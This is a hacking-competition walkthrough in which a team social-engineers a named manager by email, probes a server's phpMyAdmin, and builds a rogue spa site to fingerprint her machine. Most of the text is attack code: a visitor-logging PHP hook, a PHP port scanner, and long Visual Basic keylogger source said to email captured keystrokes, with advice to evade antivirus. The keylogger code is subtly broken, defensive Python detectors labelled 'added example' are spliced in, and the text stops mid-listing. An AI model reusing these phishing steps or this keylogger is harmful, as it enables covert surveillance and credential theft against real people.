Munir Njiru || Ruth Efrain || Ibrahim Gathungu 
HackBattle 2013 
WalkThrough 
March 28, 2014
The Scenario 
The Process 
The server looks well protected in the above scenario, but the scenario also shows evidence of workstations which are not behind the same firewall. In team 0wnErz's case these were the best target, but how to get to them was the tricky bit. So the starting point was what we see, i.e.
http://197.232.19.194
Looking at the site: static HTML, nothing fancy on it, no PHP code, therefore ruling out all possibility of SQL injections, which is everyone’s juicy cake. Going for the forms, drat, those mail too, so no PHP form to post to.
The worst you got was directory listing and failed Adobe gallery scripts missing from the gallery page; damn, those would have helped us read the logs, as they need that access to work. So what now? Look at what the site has to offer.
Found 2 emails:
· Joan.wokabi@gmail.com – Manager (Home Page)
· Daniella.wambuas@gmail.com – IT Staff Manager (About Us Page)
So basically for now we have 2 managers, a business one and a techie one, so from here the push was for the business manager; let’s see if she can help us.
So our first contact was to complain about the lack of user experience on the appointment page, nothing fancy, just to see how she takes it and gauge our audience. This is how it went.
She replied, and it’s apparent that she does care about user experience. One thing noted though: she copied Daniella in the response, who we found out is Daniel, and the email was misspelled on the site.
So next, a little bit more getting to know about the whereabouts, but noticing there is a “database” where we have been recorded, but where?? Nice!!!!!!
A little bit more talk and she asks for more information about us, and we gladly give our alias, justifying our email too as to why it is not so personalized ;). On doing this, and with the rapport building up, Joan mentions something important … she input us in the database and she has access to it; also, from her email we can see that there’s an application to manage a database.
I don’t know about you, but most people I know have:
· phpMyAdmin
· sqlbuddy
Let’s go with number one though, and the most common install directories for the system. Well, long story short, after a slow trial and error we found a /data directory. Cool, I know, right? ☺ Progress finally, but now we need to tread carefully.
Now there are 2 things we can do:
· try to exploit the phpMyAdmin
· try to trap Joan and compromise Joan’s machine since she has access
We decided to try both but weigh our chances.
phpMyAdmin 
So step one was view the 
rror
Also notice test.php; well, that’s phpinfo, an awesome wealth of information about the server:
Server root: /etc/apache2 
webroot: /var/www/ 
User/Group www-data(33)/33 
php version: 5.5.3-1ubuntu2.2 
allow_url_fopen On 
mysql: 5.5.35 
internal IP: 192.168.200.2 
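An added example, not part of the original walkthrough: the slow guessing of install directories and the exposed phpinfo page described above both leave a trail in the web server's access log, and because the guessing was slow a per-hour rate threshold will not fire, so this sketch counts distinct admin-tool names requested per client over the whole log instead. The log lines, client addresses, name lists and the location of test.php are constructed assumptions.

```python
import re
from collections import Counter, defaultdict

# Constructed sample in Apache combined log format (not taken from the page).
# 203.0.113.7 guesses admin-tool directories a few requests per day;
# 198.51.100.20 is an ordinary visitor with one stray 404.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2014:09:02:11 +0300] "GET /phpmyadmin/ HTTP/1.1" 404 498 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2014:15:40:02 +0300] "GET /pma/ HTTP/1.1" 404 498 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Mar/2014:08:13:45 +0300] "GET /phpMyAdmin/ HTTP/1.1" 404 498 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Mar/2014:19:27:30 +0300] "GET /sqlbuddy/ HTTP/1.1" 404 498 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2014:10:05:09 +0300] "GET /mysql/ HTTP/1.1" 404 498 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Mar/2014:11:51:17 +0300] "GET /data/ HTTP/1.1" 200 7312 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Mar/2014:11:53:40 +0300] "GET /test.php HTTP/1.1" 200 68211 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Mar/2014:09:05:00 +0300] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Mar/2014:09:05:04 +0300] "GET /gallery.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Mar/2014:09:05:09 +0300] "GET /about.html HTTP/1.1" 200 3900 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Mar/2014:09:06:30 +0300] "GET /admin HTTP/1.1" 404 498 "-" "Mozilla/5.0"
"""

# client, timestamp, request target, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3}) ')

# Assumed watch lists: directory names commonly used for database admin tools,
# and file names commonly used for phpinfo() pages.
ADMIN_NAMES = {"phpmyadmin", "pma", "myadmin", "mysql", "sqlbuddy",
               "dbadmin", "db", "data", "admin"}
INFO_PAGES = {"test.php", "info.php", "phpinfo.php"}


def parse(log_text):
    """Yield (client, timestamp, path, status) for every well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            client, ts, target, status = m.groups()
            yield client, ts, target.split("?", 1)[0], status


def first_segment(path):
    """Lower-cased first path component, so /phpMyAdmin/ and /phpmyadmin/ match."""
    return path.strip("/").split("/", 1)[0].lower()


def analyse(log_text, min_distinct=4):
    """Report clients that requested >= min_distinct admin-style names, at any pace."""
    probed = defaultdict(set)     # every admin-style name the client asked for
    answered = defaultdict(set)   # the ones that did not return 404
    info = defaultdict(set)       # phpinfo-style pages served with 200
    for client, _ts, path, status in parse(log_text):
        name = first_segment(path)
        if name in ADMIN_NAMES:
            probed[client].add(name)
            if status != "404":
                answered[client].add(name)
        if path.rsplit("/", 1)[-1].lower() in INFO_PAGES and status == "200":
            info[client].add(path)
    return {
        client: {
            "probed": sorted(names),
            "answered": sorted(answered[client]),
            "info_pages": sorted(info[client]),
        }
        for client, names in probed.items()
        if len(names) >= min_distinct
    }


def peak_hourly_rate(log_text, client):
    """Highest number of requests the client made in any single clock hour."""
    hours = Counter(ts[:14] for c, ts, _p, _s in parse(log_text) if c == client)
    return max(hours.values()) if hours else 0


if __name__ == "__main__":
    for client, finding in analyse(SAMPLE_LOG).items():
        print(client, finding, "peak/hour:", peak_hourly_rate(SAMPLE_LOG, client))
```

In the constructed sample the ordinary visitor has a higher peak hourly rate than the client doing the guessing, which is why the check keys on distinct names rather than request volume.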
Back to phpMyAdmin. Well, we are dealing with one revision from the latest version: it’s 4.1.8.
What are the odds we will kill this thing and go free? Well, seeing the prompt tells you that no user goes in without a pass, so we downloaded the same version of phpMyAdmin and installed it on our end. Now only one problem: we create a valid login to a default db, i.e. mysql, however we can’t replay the 4 cookies, which, as we realized later, is because the online one lacked mcrypt while we had it, therefore our cookie pattern was quite different.
“God Blesses those who put errors on their homepage and this server wasn’t 
blessed it was cursed!!! ” 
So let’s go the Joan way first; if she has access to this we shall know, but we need to be smart about this, so here is the breakdown of the needs.
· Find Joan’s environment: she must be one of the workstations; what’s she running, what’s her address, etc.
· Come up with a super trap and hook Joan to it, then get enough info to steal her credentials and log in as her.
So for the first, team 0wnErz went with make the competition, so acquire a rogue domain first; we got (http://spa.oo3.co). We took a few days to just make a nice HTML site for a spa but added a bit of PHP code in two sections: the first took her information as she visited the home page and wrote it to a text file, and in case she missed that we had another similar hook that mailed us the information when she submitted a form.
The information we needed most was:
· IP
· Full User Agent information, including OS information, to aid in performing our attack.
The Site: 
The script on the homepage had this PHP added to it; it wrote to two files, the first got a summary of just what we needed and the second everything, in case there were extras:
<?php
$filename="0xt0uaipg.africahackon";
$filename2="0xt0uaipg2.africahackon";
// The proxy header is only present when a proxy adds it
$forwarded = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : "";
// Summary record: visitor address, browser string and proxy-supplied address
$data="Server IP: ".$_SERVER['REMOTE_ADDR']."\n User Agent: ".$_SERVER['HTTP_USER_AGENT']."\n X-Forwarder:".$forwarded."\n
############################################################################################
\n\n";
file_put_contents($filename, $data, FILE_APPEND);
// Full record: every entry of $_SERVER, written once after the loop
$fullheaders = "";
foreach ($_SERVER as $key => $value) {
$fullheaders .= $key . ": " . $value . "\n \n";
}
file_put_contents($filename2, $fullheaders, FILE_APPEND);
?>
So we talked to Joan to check it out and she did: ;)
So she is on an XP and her IP is that as is on screen, Firefox 27, damn, a lot of work here if we go for a browser attack, but let’s check if the IP is for a router or proxy or the actual machine. So we made a simple port scanner, non-noisy ☺
<?php
// Banner
echo "####################################<br/>\nTeam 0wnErz HB2013 PortScanner <br/>\n ####################################<br/><br />\n";
$host = "197.232.19.195";
$ports=array("21","22","23","25","53","80","110","143","139","389","443","587","1352","1433","3306","3389","5900","8080");
$arrlength=count($ports);
for($i=0;$i<$arrlength;$i++) {
// One TCP connect per port, 10 second timeout
$fp = fsockopen($host,$ports[$i],$errno,$errstr,10);
if($fp)
{
echo "port " . $ports[$i] . " open on " . $host ."<br />\n";
echo "<br/>";
fclose($fp);
}
else
{
echo "port " . $ports[$i] . " closed on " . $host . "<br />\n";
echo "<br/>";
}
// Push each result to the browser as it arrives
flush();
}
?>
Anyway, as you can see, nothing fancy; fsock is like telnet in PHP :D only we can do it from our webserver online or locally. If it gets blacklisted it’s easy to move to another server and continue, but we didn’t,…. no noise :D
Interesting: rdesktop is on this thing, and http, but rdesktop is important, let’s test it.
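An added example, not part of the original walkthrough, showing how the scanner above looks from the defender's side: with a 10-second fsockopen timeout per port the 18 probes can arrive as slowly as one every ten seconds, so detection has to key on distinct destination ports per source rather than on connection rate. The record format, addresses and thresholds are constructed assumptions; only the port list and the two answering services (http and rdesktop) come from the page.

```python
from collections import defaultdict

# Port list used by the scanner shown on the page.
PAGE_PORTS = [21, 22, 23, 25, 53, 80, 110, 143, 139, 389, 443, 587,
              1352, 1433, 3306, 3389, 5900, 8080]


def build_sample():
    """Constructed firewall records: 'epoch_seconds src dst dport verdict'."""
    lines = []
    # One source walks the page's port list, one attempt every 10 seconds;
    # only http and rdesktop are allowed through.
    for i, port in enumerate(PAGE_PORTS):
        verdict = "ACCEPT" if port in (80, 3389) else "DROP"
        lines.append(f"{1395990000 + 10 * i} 203.0.113.50 192.0.2.10 {port} {verdict}")
    # An ordinary client makes many more connections, all to port 80.
    for i in range(30):
        lines.append(f"{1395990000 + 7 * i} 198.51.100.20 192.0.2.10 80 ACCEPT")
    return "\n".join(lines)


def find_scans(records, min_ports=10, min_failed_ratio=0.5):
    """Flag (src, dst) pairs that touched many distinct ports, most of them refused."""
    verdicts = defaultdict(dict)   # (src, dst) -> {port: last verdict}
    times = defaultdict(list)      # (src, dst) -> timestamps of all attempts
    for line in records.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue               # skip malformed records
        ts, src, dst, port, verdict = parts
        verdicts[(src, dst)][int(port)] = verdict
        times[(src, dst)].append(int(ts))

    findings = []
    for (src, dst), ports in verdicts.items():
        failed = sum(1 for v in ports.values() if v != "ACCEPT")
        if len(ports) >= min_ports and failed / len(ports) >= min_failed_ratio:
            findings.append({
                "src": src,
                "dst": dst,
                "distinct_ports": len(ports),
                "open_ports": sorted(p for p, v in ports.items() if v == "ACCEPT"),
                "attempts": len(times[(src, dst)]),
                "span_seconds": max(times[(src, dst)]) - min(times[(src, dst)]),
            })
    return findings


if __name__ == "__main__":
    for finding in find_scans(build_sample()):
        print(finding)
```

The ordinary client in the sample makes 30 connections against the scanner's 18, so a volume threshold alone would rank the wrong source first.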
Windows Server 2003, WTF :D. OK, someone’s playing us, so now part 2 of our attack needs to be smart; we don’t have a very direct target.
Since we are dealing with an XP (since the user agent didn’t lie, or rather we chose to believe that), either way we will need a Windows payload. Windows XP and Server 2003 lack elevated desktop, so binding some nice application to a keylogger should yield good results. If you like commercially done keyloggers you can get things like redfox and ardamax etc., limitless, but anyway save yourself the hustle and write some code; signature based AVs won’t have them most probably, and keep it on simple logic, not complex hooks, those get flagged.
Don’t get jealous, ours does:
· Screenshots and keys every ten minutes to our harvester email.
· And keys and apps keys have been trapped from
We put our things together the simple way, don’t download and run :D.
Note:
You need a harvester email, preferably a Gmail one. Easiest to send to.
Here is a snippet from the logic of our keylogger in VB.
‘basic emailer include and simple system output
Imports System.IO
Imports System.Net.Mail
‘ yes if you are asking why the driver declares below, it’s because we want to reduce dependencies and work with what windows already has.
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Declare Function RegisterServiceProcess Lib "Kernel32.dll" (ByVal dwProcessId As Integer, 
ByVal dwType As Integer) As Integer 
Private Declare Function GetForegroundWindow Lib "user32.dll" () As Int32 
Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As 
Int32, ByVal lpString As String, ByVal cch As Int32) As Int32 
‘basic house cleaning for caps and shift key presses so that we accurately record letters as caps or not 
caps in our main keylogger 
Public Function CAPSLOCKON() As Boolean 
If My.Computer.Keyboard.CapsLock = True Then 
Return True 
Else 
Return False 
End If 
End Function 
Dim mimiNiCapsAmaLa As Integer 
Dim Shifter As Integer 
‘Keylogger Engine- usually behind your timer ;) ours is a 10 minute space on the highest of our 3 
timers and a textbox to pass your data through. 
Shifter = GetAsyncKeyState(System.Windows.Forms.Keys.ShiftKey) 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.A) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "A" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "a" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.B) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "B"
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "b" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.C) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "C" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "c" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "D" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "d" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.E) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "E" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "e"
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "F" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "f" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.G) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "G" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "g" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.H) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "H" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "h" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.I)
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "I" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "i" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.J) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "J" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "j" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.K) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "K" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "k" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.L) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "L" 
End If
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "l" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.M) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "M" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "m" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.N) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "N" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "n" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.O) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "O" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then
txtNishikieKeys.Text = txtNishikieKeys.Text & "o" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.P) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "P" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "p" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Q) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "Q" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "q" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.R) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "R" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "r" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.S)
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "S" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "s" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.T) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "T" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "t" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.U) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "U" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "u" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.V) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "V" 
End If
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "v" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.W) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "W" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "w" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.X) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "X" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "x" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Y) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "Y" 
End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "y" 
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Z) 
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "Z" 
